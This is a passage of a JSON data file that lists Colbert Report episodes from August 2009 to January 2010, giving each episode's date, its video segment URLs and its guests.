        "http://thecolbertreport.cc.com/videos/qwyqmu/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/jrwpha/the-word---arch-enemies"
      ],
      "guest": "Ang Lee"
    },
    {
      "date": "2009-08-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/om1fcy/intro---08-20-09",
        "http://thecolbertreport.cc.com/videos/bgxuqk/france-bans-elephants",
        "http://thecolbertreport.cc.com/videos/ho2y6d/stephen-s-sound-advice---how-to-make-babies",
        "http://thecolbertreport.cc.com/videos/3muzmh/chris-matthews",
        "http://thecolbertreport.cc.com/videos/gv0u6s/sign-off---vacation-begins",
        "http://thecolbertreport.cc.com/videos/k1zrq2/colbert-platinum---urbane-nomads--gigayacht---michael-jackson-diamond"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2009-09-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dq2vzv/intro---09-14-09",
        "http://thecolbertreport.cc.com/videos/npiiku/conservatives-are-back",
        "http://thecolbertreport.cc.com/videos/ehltxr/kanye-west-interrupts-taylor-swift-at-the-vmas",
        "http://thecolbertreport.cc.com/videos/ljbubg/cory-booker",
        "http://thecolbertreport.cc.com/videos/4kq9de/sign-off---goodnight"
      ],
      "guest": "Cory Booker"
    },
    {
      "date": "2009-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/drgqxg/world-record-for-mexican-insults",
        "http://thecolbertreport.cc.com/videos/c9v1s6/the-word---let-freedom-ka-ching",
        "http://thecolbertreport.cc.com/videos/qm9oq3/christiane-amanpour",
        "http://thecolbertreport.cc.com/videos/tcjp92/stephen-loses-world-record-to-lou-dobbs",
        "http://thecolbertreport.cc.com/videos/hen1ip/better-know-a-lobby---health-care-for-america-now"
      ],
      "guest": "Christiane Amanpour"
    },
    {
      "date": "2009-09-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ch7xyz/intro---09-16-09",
        "http://thecolbertreport.cc.com/videos/dp3jiw/body-worlds-plans-cadaver-sex-exhibit",
        "http://thecolbertreport.cc.com/videos/p1ugzo/figgy-moonpowder",
        "http://thecolbertreport.cc.com/videos/1642tt/wayne-coyne",
        "http://thecolbertreport.cc.com/videos/pafbhp/citizens-united-v--federal-election-commission---jeffrey-toobin"
      ],
      "guest": "The Flaming Lips"
    },
    {
      "date": "2009-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oclyoo/goat-lab",
        "http://thecolbertreport.cc.com/videos/5psdx6/goat-lab---jon-ronson",
        "http://thecolbertreport.cc.com/videos/3zmd8j/frank-bruni",
        "http://thecolbertreport.cc.com/videos/xl4dp2/i-s-on-edjukashun---muslim-textbooks---tony-danza"
      ],
      "guest": "Frank Bruni"
    },
    {
      "date": "2009-09-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fscepw/intro---09-22-09",
        "http://thecolbertreport.cc.com/videos/brwe58/atone-phone---emmy-awards",
        "http://thecolbertreport.cc.com/videos/h3pbsv/atone-phone---jon-stewart-calls-to-apologize",
        "http://thecolbertreport.cc.com/videos/oqiy0y/shai-agassi",
        "http://thecolbertreport.cc.com/videos/zxvw0a/sign-off---shofar-goodnight"
      ],
      "guest": "Shai Agassi"
    },
    {
      "date": "2009-09-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/epco4o/lunatic-dictator-accommodations",
        "http://thecolbertreport.cc.com/videos/xtts8p/capitalism-s-enemy---michael-moore",
        "http://thecolbertreport.cc.com/videos/hwx2pv/aj-jacobs",
        "http://thecolbertreport.cc.com/videos/8ch7no/sign-off---thank-you-for-joining-us",
        "http://thecolbertreport.cc.com/videos/npdo9z/tip-wag---guns-on-amtrak--fake-lesbians---battleship-audition"
      ],
      "guest": "Michael Moore, A.J. Jacobs"
    },
    {
      "date": "2009-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/92d7p3/intro---09-24-09",
        "http://thecolbertreport.cc.com/videos/srdbkv/atone-phone---larry-king-calls",
        "http://thecolbertreport.cc.com/videos/f4xrhk/easter-under-attack---peeps-display",
        "http://thecolbertreport.cc.com/videos/xqer72/ken-burns",
        "http://thecolbertreport.cc.com/videos/cqqzqe/sign-off---automated-desk",
        "http://thecolbertreport.cc.com/videos/rh4p4f/tom-delay-dances-with-the-stars"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2009-09-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ph4cw3/atone-phone---last-day-of-apologies",
        "http://thecolbertreport.cc.com/videos/89wc6t/do--dump-or-marry",
        "http://thecolbertreport.cc.com/videos/r9at2m/sheryl-wudunn",
        "http://thecolbertreport.cc.com/videos/wsefin/sign-off---goodnight--conan"
      ],
      "guest": "Sheryl WuDunn"
    },
    {
      "date": "2009-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8qd7gf/intro---09-29-09",
        "http://thecolbertreport.cc.com/videos/4bcajc/spider-pope",
        "http://thecolbertreport.cc.com/videos/22jcm5/cheating-death---snus---placebo-effect",
        "http://thecolbertreport.cc.com/videos/03ei16/matt-latimer",
        "http://thecolbertreport.cc.com/videos/7bmnxg/sign-off---richard-dawkins-will-be-here-tomorrow",
        "http://thecolbertreport.cc.com/videos/ph4cw3/atone-phone---last-day-of-apologies"
      ],
      "guest": "Matt Latimer"
    },
    {
      "date": "2009-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6bhu7e/intro---09-30-09",
        "http://thecolbertreport.cc.com/videos/rrbojv/send-your-medical-bills-to-max-baucus",
        "http://thecolbertreport.cc.com/videos/m2yjay/a-pace-odyssey",
        "http://thecolbertreport.cc.com/videos/jhrv69/richard-dawkins",
        "http://thecolbertreport.cc.com/videos/t5u4g8/sign-off---goodnight--grammy",
        "http://thecolbertreport.cc.com/videos/kf4xf5/the-word---out-of-the-closet"
      ],
      "guest": "Richard Dawkins"
    },
    {
      "date": "2009-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wlav1v/najibullah-zazi-threatens-beauty-supplies",
        "http://thecolbertreport.cc.com/videos/6dv0jz/2016-olympics-in-chicago---george-wendt",
        "http://thecolbertreport.cc.com/videos/zxuz0a/francis-collins",
        "http://thecolbertreport.cc.com/videos/q9o9qv/sign-off---new-slang",
        "http://thecolbertreport.cc.com/videos/91s6ka/threatdown---environmentalists--kang-lee---mountain-pine-beetles"
      ],
      "guest": "George Wendt, Dr. Francis Collins"
    },
    {
      "date": "2009-10-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/733czp/intro---10-05-09",
        "http://thecolbertreport.cc.com/videos/7yi77e/americans-for-prosperity-cheer-chicago-s-failure",
        "http://thecolbertreport.cc.com/videos/k8e7bl/eating-the-distance---the-brad-sciullo-story-pt--2",
        "http://thecolbertreport.cc.com/videos/wfl2if/arne-duncan",
        "http://thecolbertreport.cc.com/videos/d1uxmt/sign-off---goodnight"
      ],
      "guest": "Arne Duncan"
    },
    {
      "date": "2009-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lomf6q/new-swine-flu-vaccine-drops",
        "http://thecolbertreport.cc.com/videos/7060r2/the-road-ahead-in-afghanistan---lara-logan",
        "http://thecolbertreport.cc.com/videos/yz886x/john-darnielle",
        "http://thecolbertreport.cc.com/videos/58l1kv/the-word---learning-is-fundamental"
      ],
      "guest": "Lara Logan, the Mountain Goats"
    },
    {
      "date": "2009-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kt8d60/intro---10-07-09",
        "http://thecolbertreport.cc.com/videos/p6tyac/human-sacrifice-channel",
        "http://thecolbertreport.cc.com/videos/i1e7h0/craziest-f--king-thing-i-ve-ever-heard---eye-tooth",
        "http://thecolbertreport.cc.com/videos/59gyno/alison-gopnik",
        "http://thecolbertreport.cc.com/videos/9ergzb/sign-off---jasper-t--jowls",
        "http://thecolbertreport.cc.com/videos/qm22ls/formula-401--a-star-is-born"
      ],
      "guest": "Alison Gopnik"
    },
    {
      "date": "2009-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ac6rq4/intro---10-08-09",
        "http://thecolbertreport.cc.com/videos/u1v1j7/kevin-the-iranian-intern",
        "http://thecolbertreport.cc.com/videos/jigfye/sport-report---rush-limbaugh---ted-williams--frozen-head",
        "http://thecolbertreport.cc.com/videos/ih4ouf/colin-beavan",
        "http://thecolbertreport.cc.com/videos/7t5ve1/sign-off---buddy-system",
        "http://thecolbertreport.cc.com/videos/81wvda/tip-wag---conservapedia--louvre---honda-unicycle"
      ],
      "guest": "Colin Beavan"
    },
    {
      "date": "2009-10-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6s4gb6/intro---10-12-09",
        "http://thecolbertreport.cc.com/videos/xiuiwd/happy-columbus-day",
        "http://thecolbertreport.cc.com/videos/vnmcv0/fallback-position---james-blake",
        "http://thecolbertreport.cc.com/videos/2ko3eq/sanjay-gupta",
        "http://thecolbertreport.cc.com/videos/izp5gd/sign-off---thanks-to-the-guests"
      ],
      "guest": "Shashi Tharoor, Dr. Sanjay Gupta"
    },
    {
      "date": "2009-10-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g87deh/intro---10-13-09",
        "http://thecolbertreport.cc.com/videos/4cco61/jermaine-maine-tweets-miley-cyrus-facts",
        "http://thecolbertreport.cc.com/videos/7jpek6/the-born-supremacy---david-javerbaum",
        "http://thecolbertreport.cc.com/videos/s52xb5/sylvia-earle",
        "http://thecolbertreport.cc.com/videos/obxlza/sign-off---gmail",
        "http://thecolbertreport.cc.com/videos/l4n6tb/war-of-peace---shashi-tharoor"
      ],
      "guest": "David Javerbaum, Sylvia Earle"
    },
    {
      "date": "2009-10-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g6skj6/pat-roberts-warns-against-health-care-box-canyon",
        "http://thecolbertreport.cc.com/videos/3copn0/the-obesity-epidemic---amy-farrell",
        "http://thecolbertreport.cc.com/videos/ljym9p/the-rza",
        "http://thecolbertreport.cc.com/videos/wijvgm/sign-off---should-have-put-a-ring-on-it",
        "http://thecolbertreport.cc.com/videos/m5y3ox/the-word---symbol-minded"
      ],
      "guest": "Amy Farrell, The RZA"
    },
    {
      "date": "2009-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0bzt4y/intro---10-15-09",
        "http://thecolbertreport.cc.com/videos/0a133r/the-money-shot",
        "http://thecolbertreport.cc.com/videos/8xmsj4/the-mayo-lution-will-not-be-televised",
        "http://thecolbertreport.cc.com/videos/7s45sd/jerry-mitchell",
        "http://thecolbertreport.cc.com/videos/sgqznj/sign-off---stephen-unveils-a-new-portrait",
        "http://thecolbertreport.cc.com/videos/ubn9ao/yahweh-or-no-way---legislation-prayers---fake-shroud-of-turin"
      ],
      "guest": "Jerry Mitchell"
    },
    {
      "date": "2009-10-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4srpg9/george-will-s-long-tie",
        "http://thecolbertreport.cc.com/videos/gy6tin/the-word---don-t-ask-don-t-tell",
        "http://thecolbertreport.cc.com/videos/xhz2mw/cornel-west",
        "http://thecolbertreport.cc.com/videos/2onypd/sign-off---don-t-move"
      ],
      "guest": "Cornel West"
    },
    {
      "date": "2009-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l98jof/intro---10-27-09",
        "http://thecolbertreport.cc.com/videos/3f3ssx/george-w--bush-s-motivational-speech",
        "http://thecolbertreport.cc.com/videos/wtcyjy/colbert-platinum---harvard-billionaires---red-diamond-suv",
        "http://thecolbertreport.cc.com/videos/8c9hx0/gail-collins",
        "http://thecolbertreport.cc.com/videos/plvf84/sign-off---goodnight-",
        "http://thecolbertreport.cc.com/videos/liq1p2/job-recommendation-from-stephen-colbert",
        "http://thecolbertreport.cc.com/videos/dtlk2w/stephen-s-sound-advice---how-to-get-a-job"
      ],
      "guest": "Randall Balmer, Gail Collins"
    },
    {
      "date": "2009-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zspzvk/intro---10-28-09",
        "http://thecolbertreport.cc.com/videos/qvcosm/joe-lieberman-is-a-true-independent",
        "http://thecolbertreport.cc.com/videos/1r96o8/big-bang-theory",
        "http://thecolbertreport.cc.com/videos/3r9su2/brian-cox",
        "http://thecolbertreport.cc.com/videos/bzrvnc/sign-off---future-stephen",
        "http://thecolbertreport.cc.com/videos/1va17m/holy-water-under-the-bridge---randall-balmer"
      ],
      "guest": "Brian Cox"
    },
    {
      "date": "2009-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bbj9sz/intro---10-29-09",
        "http://thecolbertreport.cc.com/videos/yl6xd1/usa-today-slams-dirigibles",
        "http://thecolbertreport.cc.com/videos/al6ssq/threatdown---halloween-edition",
        "http://thecolbertreport.cc.com/videos/ku01px/bill-simmons",
        "http://thecolbertreport.cc.com/videos/xalyef/sign-off---thanks-to-bill-simmons---rosanne-cash",
        "http://thecolbertreport.cc.com/videos/w56skk/the-word---you-genics"
      ],
      "guest": "Rosanne Cash, Bill Simmons"
    },
    {
      "date": "2009-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vfdy5q/intro---11-02-09",
        "http://thecolbertreport.cc.com/videos/uke17x/used-karzai",
        "http://thecolbertreport.cc.com/videos/uxgb9s/alpha-dog-of-the-week---arnold-schwarzenegger",
        "http://thecolbertreport.cc.com/videos/t62cji/nicholas-thompson",
        "http://thecolbertreport.cc.com/videos/7g9pgn/sign-off---donate-to-the-u-s--speedskating-team"
      ],
      "guest": "Nicholas Thompson"
    },
    {
      "date": "2009-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hlio3b/intro---11-03-09",
        "http://thecolbertreport.cc.com/videos/zbi6j6/canadian-hackers-sabotage-colbert-nation",
        "http://thecolbertreport.cc.com/videos/olb2ep/nailed--em---mormon-church-trespassing",
        "http://thecolbertreport.cc.com/videos/qdk21v/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/sqdke8/sign-off---they-call-me-mister-fry",
        "http://thecolbertreport.cc.com/videos/b7il1x/sport-report---nyc-marathon---olympic-speedskating"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2009-11-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wm06ja/intro---11-04-09",
        "http://thecolbertreport.cc.com/videos/hzm3ur/-09-off-year-semi-presidential-electferendum",
        "http://thecolbertreport.cc.com/videos/src597/formidable-opponent---global-warming-with-al-gore",
        "http://thecolbertreport.cc.com/videos/lkkq9m/harold-evans",
        "http://thecolbertreport.cc.com/videos/64ucdo/sign-off---poison-gas",
        "http://thecolbertreport.cc.com/videos/ol1mvi/the-word---the-green-mile"
      ],
      "guest": "Harold Evans"
    },
    {
      "date": "2009-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ymrkt5/intro---11-05-09",
        "http://thecolbertreport.cc.com/videos/i7dq6q/guy-fawkers",
        "http://thecolbertreport.cc.com/videos/6vac7m/cheating-death---swine-flu-scam-detector---vaxaconda",
        "http://thecolbertreport.cc.com/videos/cj1lqu/william-bratton",
        "http://thecolbertreport.cc.com/videos/6e51a0/sign-off---donate-to-u-s--speedskating",
        "http://thecolbertreport.cc.com/videos/hnu3dh/tip-wag---rush-limbaugh---us-weekly"
      ],
      "guest": "Joey Cheek, Chief William Bratton"
    },
    {
      "date": "2009-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/p4del4/intro---11-09-09",
        "http://thecolbertreport.cc.com/videos/zhrahz/trouble--coverage",
        "http://thecolbertreport.cc.com/videos/uaeaom/u-s--speedskating-team-takes-gold",
        "http://thecolbertreport.cc.com/videos/62flai/thomas-campbell",
        "http://thecolbertreport.cc.com/videos/5hgk8f/sign-off---goodnight"
      ],
      "guest": "Thomas Campbell"
    },
    {
      "date": "2009-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nwm4io/intro---11-10-09",
        "http://thecolbertreport.cc.com/videos/bpec5m/barney-frank-is-not-a-great-outdoorsman",
        "http://thecolbertreport.cc.com/videos/476wty/maria-shriver",
        "http://thecolbertreport.cc.com/videos/rl73xb/sign-off---you-can-t-take-it-with-you",
        "http://thecolbertreport.cc.com/videos/ocuoqq/exclusive---better-know-a-district---delaware-s-at-large---mike-castle",
        "http://thecolbertreport.cc.com/videos/i4pgl0/better-know-a-district---delaware-s-at-large---mike-castle"
      ],
      "guest": "Maria Shriver"
    },
    {
      "date": "2009-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8m4icj/intro---11-11-09",
        "http://thecolbertreport.cc.com/videos/d3hhgz/goldman-sachs-does-god-s-work",
        "http://thecolbertreport.cc.com/videos/1al5v4/tip-wag---san-francisco-chronicle---george-clinton",
        "http://thecolbertreport.cc.com/videos/p4wqld/christopher-caldwell",
        "http://thecolbertreport.cc.com/videos/xp7fig/sign-off---stephen-s-fight-with-christopher-caldwell",
        "http://thecolbertreport.cc.com/videos/2vmljd/iraniversary---karim-sadjadpour"
      ],
      "guest": "Christopher Caldwell"
    },
    {
      "date": "2009-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lbfhkm/intro---11-12-09",
        "http://thecolbertreport.cc.com/videos/cnw6wz/miracle-whip-buys-ad-space",
        "http://thecolbertreport.cc.com/videos/ips2v8/the-word---the-money-shot",
        "http://thecolbertreport.cc.com/videos/2k90o4/sport-report---cricket-scandal---letter-writing-campaign",
        "http://thecolbertreport.cc.com/videos/1yilwm/woody-harrelson",
        "http://thecolbertreport.cc.com/videos/l85kiv/grover-the-hill"
      ],
      "guest": "Woody Harrelson"
    },
    {
      "date": "2009-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t5pqdy/intro---11-16-09",
        "http://thecolbertreport.cc.com/videos/8ggl86/obama-bows-to-japanese-emperor",
        "http://thecolbertreport.cc.com/videos/xgze85/alpha-dog-of-the-week---joe-perry",
        "http://thecolbertreport.cc.com/videos/6einjp/paul-goldberger",
        "http://thecolbertreport.cc.com/videos/i42i9t/sign-off---good-morning--burma"
      ],
      "guest": "Paul Goldberger"
    },
    {
      "date": "2009-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/im99fb/intro---11-17-09",
        "http://thecolbertreport.cc.com/videos/z1cr8v/kid-gloves---marc-kielburger",
        "http://thecolbertreport.cc.com/videos/ij8d04/malcolm-gladwell",
        "http://thecolbertreport.cc.com/videos/w71om6/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/mwjf6e/the-word---skeletons-in-the-closet"
      ],
      "guest": "Malcolm Gladwell"
    },
    {
      "date": "2009-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/24jack/intro---11-18-09",
        "http://thecolbertreport.cc.com/videos/odu5xx/eggo-waffles-shortage-alert",
        "http://thecolbertreport.cc.com/videos/cuhtda/threatdown---quetzalcoatl--santa-claus---canadian-groin-kickers",
        "http://thecolbertreport.cc.com/videos/ah5dzo/norah-jones",
        "http://thecolbertreport.cc.com/videos/1vm4fs/exclusive---better-know-a-district---california-s-12th---jackie-speier-pt--1",
        "http://thecolbertreport.cc.com/videos/udd9qu/exclusive---better-know-a-district---california-s-12th---jackie-speier-pt--2",
        "http://thecolbertreport.cc.com/videos/p8c7xo/better-know-a-district---california-s-12th---jackie-speier"
      ],
      "guest": "Norah Jones"
    },
    {
      "date": "2009-11-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6iz54h/stephen-shakes-his-moneymaker",
        "http://thecolbertreport.cc.com/videos/4tmz49/celebrating-the-ak-47---john-pike",
        "http://thecolbertreport.cc.com/videos/zy3jiq/sign-off---thanks--elvis-costello",
        "http://thecolbertreport.cc.com/videos/tf53hs/the-word---grand-old-pity-party"
      ],
      "guest": "John Pike, Elvis Costello"
    },
    {
      "date": "2009-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x90ton/intro---11-30-09",
        "http://thecolbertreport.cc.com/videos/qljewq/amateur-hour-at-the-white-house",
        "http://thecolbertreport.cc.com/videos/ahhfo9/better-know-a-lobby---ploughshares-fund",
        "http://thecolbertreport.cc.com/videos/ec0x55/cevin-soling",
        "http://thecolbertreport.cc.com/videos/53k9co/sign-off---goodnight"
      ],
      "guest": "Dan Esty, Cevin Soling"
    },
    {
      "date": "2009-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jvjn7h/intro---12-01-09",
        "http://thecolbertreport.cc.com/videos/fj2x2m/u-s--army-chain-of-command",
        "http://thecolbertreport.cc.com/videos/zwjey6/gold--frankincense-and-mars---guy-consolmagno",
        "http://thecolbertreport.cc.com/videos/s6mur0/sherman-alexie",
        "http://thecolbertreport.cc.com/videos/km8wtf/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/bohr52/something-is-melting-in-denmark---dan-esty"
      ],
      "guest": "Guy Consolmagno, Sherman Alexie"
    },
    {
      "date": "2009-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lstmf1/intro---12-02-09",
        "http://thecolbertreport.cc.com/videos/yvq647/deployment-figures",
        "http://thecolbertreport.cc.com/videos/et6ksb/craig-watkins",
        "http://thecolbertreport.cc.com/videos/cyylc0/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/ndi826/better-know-a-made-up-district---connecticut-s-42nd"
      ],
      "guest": "Craig Watkins"
    },
    {
      "date": "2009-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qrqaja/formidable-opponent---gary-the-tennis-coach",
        "http://thecolbertreport.cc.com/videos/q8vv0p/intro---12-03-09",
        "http://thecolbertreport.cc.com/videos/knxrx6/tiger-s-tale",
        "http://thecolbertreport.cc.com/videos/hw80nv/skate-expectations---skeleton-team-tryouts---zach-lund",
        "http://thecolbertreport.cc.com/videos/heye88/janet-napolitano",
        "http://thecolbertreport.cc.com/videos/dy9y1l/sign-off---welcome-sean-julien",
        "http://thecolbertreport.cc.com/videos/qx8k9b/cheating-death---r-j--reynolds--genzyme---bionic-bottom"
      ],
      "guest": "Sec. Janet Napolitano"
    },
    {
      "date": "2009-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/opl0gz/intro---12-07-09",
        "http://thecolbertreport.cc.com/videos/l9wksx/who-s-attacking-me-now----g--edward-deseve",
        "http://thecolbertreport.cc.com/videos/t0b3f4/craziest-f--king-thing-i-ve-ever-heard---tongue-eating-parasite",
        "http://thecolbertreport.cc.com/videos/pgp8y2/bill-t--jones"
      ],
      "guest": "Bill T. Jones, a performance by the cast of \"Fela\""
    },
    {
      "date": "2009-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7a6f7k/intro---12-08-09",
        "http://thecolbertreport.cc.com/videos/0y3uce/how-far-good-parents-will-go",
        "http://thecolbertreport.cc.com/videos/gcu1ou/fed-s-dead---bernie-sanders",
        "http://thecolbertreport.cc.com/videos/9o2lyz/andy-schlafly",
        "http://thecolbertreport.cc.com/videos/2v1vhb/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/w4zn3p/tip-wag---jonas-brothers--fox-news---japanese-burger-king"
      ],
      "guest": "Sen. Bernie Sanders, Andy Schlafly"
    },
    {
      "date": "2009-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fdjwxb/intro---12-09-09",
        "http://thecolbertreport.cc.com/videos/ckek7p/monkey-threatdown---holes---banana-too-high",
        "http://thecolbertreport.cc.com/videos/h3kb0s/the-blitzkrieg-on-grinchitude---hallmark---krampus",
        "http://thecolbertreport.cc.com/videos/is6uvv/matt-taibbi",
        "http://thecolbertreport.cc.com/videos/mlp3y1/sign-off---goodnight-with-krampus",
        "http://thecolbertreport.cc.com/videos/2l8p98/fed-s-dead"
      ],
      "guest": "Matt Taibbi"
    },
    {
      "date": "2009-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/03g0d5/obama-s-nobel-prize-speech---afghandyland",
        "http://thecolbertreport.cc.com/videos/zivscx/skate-expectations---bobsled-team-tryouts",
        "http://thecolbertreport.cc.com/videos/hjnxot/lara-logan",
        "http://thecolbertreport.cc.com/videos/y74r8f/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/2jc7dn/the-word---grand-old-purity"
      ],
      "guest": "Lara Logan"
    },
    {
      "date": "2009-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/efg3d5/intro---12-14-09",
        "http://thecolbertreport.cc.com/videos/9wxgc9/president-obama---the-colbert-interview",
        "http://thecolbertreport.cc.com/videos/t1tsns/stephen-challenges-shani-davis---katherine-reutter",
        "http://thecolbertreport.cc.com/videos/vt4qtf/snoop-dogg"
      ],
      "guest": "Katherine Reutter, Snoop Dogg"
    },
    {
      "date": "2009-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x6ydfv/intro---12-15-09",
        "http://thecolbertreport.cc.com/videos/3plx6x/for-he-s-a-jowly-good-fellow",
        "http://thecolbertreport.cc.com/videos/10vyk2/the-blitzkrieg-on-grinchitude---treesus---christ-mas-tree",
        "http://thecolbertreport.cc.com/videos/i16cci/alicia-keys",
        "http://thecolbertreport.cc.com/videos/qn15hk/stephen-challenges-shani-davis",
        "http://thecolbertreport.cc.com/videos/u5g55p/exclusive---extended-interview-with-barack-obama"
      ],
      "guest": "Alicia Keys"
    },
    {
      "date": "2009-12-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ozgmuy/accenture-drops-tiger-woods",
        "http://thecolbertreport.cc.com/videos/4jdam2/the-word---spyvate-sector",
        "http://thecolbertreport.cc.com/videos/bjlb37/tom-brokaw",
        "http://thecolbertreport.cc.com/videos/q9eqq1/sign-off---goodbye--2009",
        "http://thecolbertreport.cc.com/videos/ufq6qh/prescott-financial---gold--women---sheep"
      ],
      "guest": "Tom Brokaw"
    }
  ],
  "2010": [
    {
      "date": "2010-01-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a6c63f/intro---goodbye--old-set",
        "http://thecolbertreport.cc.com/videos/qr3067/high-definition-upgrade",
        "http://thecolbertreport.cc.com/videos/ca8z2z/genitalia-bomb-threat",
        "http://thecolbertreport.cc.com/videos/hospuh/skate-expectations---curling-team-tryouts",
        "http://thecolbertreport.cc.com/videos/bqki32/skate-expectations---curling-team-tryouts---colbert-vs--shuster",
        "http://thecolbertreport.cc.com/videos/ytow3n/sign-off---thanks-for-the-new-set"
      ],
      "guest": "Erick Erickson"
    },
    {
      "date": "2010-01-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l0fai0/intro---01-05-10",
        "http://thecolbertreport.cc.com/videos/qomtkk/high-definition-advertising",
        "http://thecolbertreport.cc.com/videos/ywy8j4/night-of-terror---the-crapification-of-the-american-pant-scape",
        "http://thecolbertreport.cc.com/videos/s2n141/the-word---ideal-or-no-deal",
        "http://thecolbertreport.cc.com/videos/t3fpvm/better-know-an-enemy---yemen",
        "http://thecolbertreport.cc.com/videos/r8x6ag/riley-crane",
        "http://thecolbertreport.cc.com/videos/doe1xo/sign-off---stephen-draws-woodstock"
      ],
      "guest": "Riley Crane"
    },
    {
      "date": "2010-01-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rewr4u/intro---01-06-10",
        "http://thecolbertreport.cc.com/videos/u584e6/a-message-to-standard-definition-cable-providers",
        "http://thecolbertreport.cc.com/videos/g2gimh/drag-me-to-health---ezra-klein---linda-douglass",
        "http://thecolbertreport.cc.com/videos/h3mxst/alpha-dog-of-the-week---domino-s-pizza",
        "http://thecolbertreport.cc.com/videos/4cd9bx/charles-moore",
        "http://thecolbertreport.cc.com/videos/elm4s5/sign-off---not-stephen-s-show"
      ],
      "guest": "Capt. Charles Moore"
    },
    {
      "date": "2010-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uo3v4r/intro---01-07-10",
        "http://thecolbertreport.cc.com/videos/f2zb2u/failure-to-connect-the-dots",
        "http://thecolbertreport.cc.com/videos/z3kdhi/fatal-subtraction---barry-scheck",
        "http://thecolbertreport.cc.com/videos/wi0ong/tip-wag---burj-dubai--avatar---transgender-appointees",
        "http://thecolbertreport.cc.com/videos/c3suh9/james-fowler",
        "http://thecolbertreport.cc.com/videos/tso1cs/sign-off---goodnight"
      ],
      "guest": "Barry Scheck, James Fowler"
    },
    {
      "date": "2010-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xptxw6/harry-reid-s-racial-praise",
        "http://thecolbertreport.cc.com/videos/3s1wqs/move-your-money---eugene-jarecki",
        "http://thecolbertreport.cc.com/videos/y47i8f/colbert-platinum---estate-tax---skull-ballot-box",
        "http://thecolbertreport.cc.com/videos/4q61kj/morgan-freeman",
        "http://thecolbertreport.cc.com/videos/8e60wq/sign-off---stephen-will-be-right-back"
      ],
      "guest": "Eugene Jarecki, Morgan Freeman"
    },
    {
      "date": "2010-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qjn9bh/intro---01-12-10",
        "http://thecolbertreport.cc.com/videos/7qig8p/roxxxy-the-sex-robot",
        "http://thecolbertreport.cc.com/videos/8ln9tv/cheating-death---alzheimer-s--jet-lag---female-libido",
        "http://thecolbertreport.cc.com/videos/7jfkm7/raj-patel"
      ],
      "guest": "Raj Patel"
    },
    {
      "date": "2010-01-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w3lt72/intro---01-13-10",
        "http://thecolbertreport.cc.com/videos/34mknq/game-change-gossip",
        "http://thecolbertreport.cc.com/videos/kwpeqs/sport-report---gilbert-arenas---mark-mcgwire",
        "http://thecolbertreport.cc.com/videos/t39jgx/movies-that-are-destroying-america---avatar-edition",
        "http://thecolbertreport.cc.com/videos/1xyrig/john-heilemann",
        "http://thecolbertreport.cc.com/videos/erf677/sign-off---mark-mcgwire-action-figure"
      ],
      "guest": "John Heilemann"
    },
    {
      "date": "2010-01-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t151qr/intro---01-14-10",
        "http://thecolbertreport.cc.com/videos/dbcboq/watercressgate",
